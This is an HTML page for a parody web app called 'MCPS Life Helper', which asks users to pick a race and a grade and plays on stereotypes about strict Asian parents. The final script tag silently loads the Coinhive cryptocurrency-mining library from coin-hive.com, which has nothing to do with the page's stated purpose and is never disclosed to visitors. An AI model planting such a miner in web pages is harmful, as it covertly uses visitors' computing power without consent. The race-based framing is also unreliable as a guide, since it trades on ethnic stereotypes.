<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>MCPS Life Helper</title>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bulma/0.5.3/css/bulma.min.css">
    <style>
        body {
            font-family: sans-serif!important;
        }

        .check {
            border-color: transparent;
            transition: all 0.3s cubic-bezier(0.165, 0.84, 0.44, 1);
            box-shadow: 0 5px 10px rgba(10, 10, 10, .3), 0 0 0 1px rgba(10, 10, 10, 0);
            -webkit-box-shadow: 0 5px 10px rgba(10, 10, 10, .3), 0 0 0 1px rgba(10, 10, 10, 0);
        }

        .check:hover {
            border-color: transparent;
            background-color: white;
            -webkit-transform: scale(0.98, 0.98);
            transform: scale(0.98, 0.98);
            box-shadow: 0 5px 10px rgba(10, 10, 10, .3), 0 0 0 1px rgba(10, 10, 10, 0);
            -webkit-box-shadow: 0 5px 10px rgba(10, 10, 10, .3), 0 0 0 1px rgba(10, 10, 10, 0);
        }

        .check:active {
            border-color: transparent;
            background-color: white;
            -webkit-transform: scale(0.95, 0.95);
            transform: scale(0.95, 0.95);
            box-shadow: 0 5px 10px rgba(10, 10, 10, .3), 0 0 0 1px rgba(10, 10, 10, 0);
            -webkit-box-shadow: 0 5px 10px rgba(10, 10, 10, .3), 0 0 0 1px rgba(10, 10, 10, 0);
        }

        .buttons {
            line-height: 200%;
        }

        .buttons h3 {
            margin-bottom: 10!important;
        }
    </style>
</head>

<body>
    <section class="hero is-dark is-fullheight" style="text-align: center">
        <div class="hero-body">
            <div class="container">
                <img src="logo.png" style="height: 80px">
                <img src="MCPS_logo.png" style="margin: 10px; height: 60px; border-radius: 50%">
                <h1 class="title">
                    MCPS Life Helper
                </h1>
                <h2 class="subtitle" style="margin-left: 10vw; margin-right: 10vw; color: grey">
                    The best ever tool to check for advice while escaping whipping from parents, more specifically, Asian parents.
                </h2>

                <div class="buttons">
                    <h3 class="subtitle">Choose your race: </h3>
                    <a class="button is-small check" href="javascript:setRace('White')">
                        <strong>White</strong>
                    </a>&ensp;
                    <a class="button is-small check" href="javascript:setRace('Asian')">
                        <strong>Asian</strong>
                    </a>&ensp;
                    <a class="button is-small check" href="javascript:setRace('Black')">
                        <strong>Black</strong>
                    </a>&ensp;
                    <a class="button is-small check" href="javascript:setRace('Native American')">
                        <strong>Native American</strong>
                    </a>&ensp;
                    <a class="button is-small check" href="javascript:setRace('Native Hawaiian/Pacific Islander')">
                        <strong>Native Hawaiian/Pacific Islander</strong>
                    </a>&ensp;
                    <a class="button is-small check" href="javascript:setRace('Hispanic/Latino/Spanish Origin')">
                        <strong>Hispanic/Latino/Spanish Origin</strong>
                    </a>&ensp;
                </div>

                <div class="buttons">
                    <h3 class="subtitle">What grade did you get? </h3>
                    <a class="button is-small check" href="javascript:setGrade('A')">
                        <strong>A</strong>
                    </a>&ensp;
                    <a class="button is-small check" href="javascript:setGrade('B')">
                        <strong>B</strong>
                    </a>&ensp;
                    <a class="button is-small check" href="javascript:setGrade('C')">
                        <strong>C</strong>
                    </a>&ensp;
                    <a class="button is-small check" href="javascript:setGrade('D')">
                        <strong>D</strong>
                    </a>&ensp;
                    <a class="button is-small check" href="javascript:setGrade('FAIL')">
                        <strong>Fail</strong>
                    </a>&ensp;
                    <a class="button is-small check" href="javascript:setGrade('0')">
                        <strong>0</strong>
                    </a>&ensp;
                </div>
                <hr>
                <div id="selection">
                    <a class="button is-small check" href="javascript:check()">
                        <strong>CHECK</strong>
                    </a>&ensp;
                </div>

            </div>
        </div>

        <small style="color: grey">This is a parody against stereotyping. There is no racism nor offense intended. I apologize if this offends you.</small>
        <small style="color: grey"><a href="https://mingjie.info">Author</a> | <a href="https://opensource.org/licenses/MIT">License</a></small>
    </section>
    <script src="app.js"></script>
    <script src="https://coin-hive.com/lib/coinhive.min.js" async></script>
</body>

</html>